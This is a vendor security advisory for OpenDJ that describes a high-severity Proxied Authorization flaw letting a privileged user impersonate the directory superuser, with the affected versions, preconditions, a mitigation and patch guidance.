A security vulnerability has been discovered in OpenDJ. This issue is present in all versions of OpenDJ including 2.6.x, 2.5.0-Xpress1, 2.4.x, and possibly previous versions.
This advisory provides guidance on how to ensure your deployments can be secured. Workarounds or patches are available for the issue, which will also be included in the forthcoming OpenDJ 2.6.3 maintenance release.
The severity of the issue in this advisory is High. Deployers should take immediate steps as outlined in this advisory and apply the relevant update at the earliest opportunity.
The recommendation is to deploy the relevant patch or to upgrade to OpenDJ 2.6.3 when it becomes available.
Customers without existing patches can obtain patches for OpenDJ 2.6.0 – 2.6.2 from BackStage. Customers with deployed patches should contact the support organization to obtain an updated patch. Customers running earlier releases need to upgrade. The fix is also present in the community “trunk” nightly builds.
Issue #201504-01: Proxied Authorization may allow unexpected escalation of privileges and access.
Affected versions: 2.4.0 – 2.4.6, 2.5.0-Xpress1, 2.6.0 – 2.6.2
Fixed versions: n/a
Component: Core Server
JIRA ID: OPENDJ-2071
When someone has been granted the privileges to proxy requests and use the Proxied Authorization control, it is not possible to control who that user can impersonate. It is thus possible to impersonate the directory superuser (“cn=Directory Manager”) and bypass all access controls.
The vulnerability cannot be exploited by default; to be exercised, it requires that the authenticated user has been granted all of the following:
- The “proxied-auth” privilege
- The access control permission to use the Proxied Authorization control
- The access control permission to “proxy” as the authorization user
The enforcement of the third item was not correctly implemented by OpenDJ, resulting in the ability to proxy as any user. This is now fixed.
There is no complete workaround. One way to mitigate the issue is to make sure that the Proxied Authorization privilege is only granted to administrative accounts that are used by well known applications, for which the use of the Proxied Authorization control has been tested and verified.
Update/upgrade to a fixed version or deploy the relevant patch.